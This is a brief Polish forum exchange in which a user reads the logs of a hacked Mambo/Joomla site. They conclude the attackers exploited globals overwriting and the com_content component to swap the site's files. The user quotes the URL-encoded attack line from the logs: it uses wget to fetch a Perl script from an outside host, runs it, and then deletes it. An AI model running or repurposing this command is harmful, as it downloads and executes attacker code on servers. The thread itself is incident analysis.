Z logów które przysłałeś to wynika że atak nastąpił przez podmianę globals i komponent com_content....Wysłane przez viper
Polegał on chyba na tym,
że podmienili Ci pliki funcją wget po wywołaniu jej przez cmd z Twojego serwera.
Czyli nie pospuli bazy a tylko popodmieniali pliki tak?
to siedzi tu:
wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;
rm%20-rf%20mambo.*
tylko zamiast %20 zamień na spacje....
Sprawdzę to dziś wieczorem, bo spawa dosyć istotna - nawet chyba admina ani wejścia do backendu nie trzeba ...